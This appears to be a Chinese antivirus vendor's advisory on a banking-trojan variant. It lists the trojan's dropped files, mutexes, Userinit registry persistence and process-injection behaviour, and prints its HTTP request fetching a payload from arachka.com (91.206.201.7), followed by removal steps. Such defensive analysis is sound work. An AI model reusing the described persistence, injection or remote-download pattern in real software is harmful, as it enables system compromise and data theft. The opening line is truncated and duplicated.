该病毒为ecard病毒变种,病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC
行为分析-本地行为
1、文件运行后会释放以下文件
%System32%\sdra64.exe
%System32%\lowsec\user.ds 用于存储此特洛伊木马的加密配置
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds 用于保存收集的信息
2、修改注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
新: 字符串: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"
描述:修改注册表使用userinit启动病毒
3、病毒运行后创建互斥量名为"_AVIRA_21099"、"_AVIRA_2108"、"__SYSTEM__64AD0625__"、"D95DA28801C9FA1E000000EC
4、干扰安全软件对其查杀,如是则修改注册表使用userinit.exe启动病毒,并监视注册表发现被删除之后立即添加,遍历进程找WINLOGON.EXE、SVCHOST.EXE、EXPLORER.EXE,找到之后打开进程获取模块句柄、获取进程绝对路径判断是进程否是病毒要查找的文件路径,如不是则关闭句柄,如是则申请内存空间从病毒体00400000为起始地址向以上进程中写入1024字节病毒数据。
5、收集电子邮件可能会通过电子邮件发送垃圾邮件信息来传播自身:
pop3
%s://%s:%s@%u.%u.%u.%u:%u/
ftppop3
/
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)http/1.1
post
geturlmon.dll
http/1.1
行为分析-网络行为
病毒运行后向91.206.201.7请求GET及发送post信息:
GET /djwlc/djwl.bin HTTP/1.1
Accept: **
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arachka.com
Content-Length: 373
Connection: Keep-Alive
Pragma: no-cache
清除方案
1、使用安天防线可彻底清除此病毒(推荐)
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1)先打开Atool工具结束病毒相关进程
(2)使用Atool工具删除病毒衍生的文件
%System32%\sdra64.exe
%System32%\lowsec\user.ds
%System32%\lowsec\user.ds.lll
%System32%\lowsec\local.ds
(3)恢复病毒修改的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
新: 字符串:
"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"
旧: 字符串: "C:\WINDOWS\system32\userinit.exe,"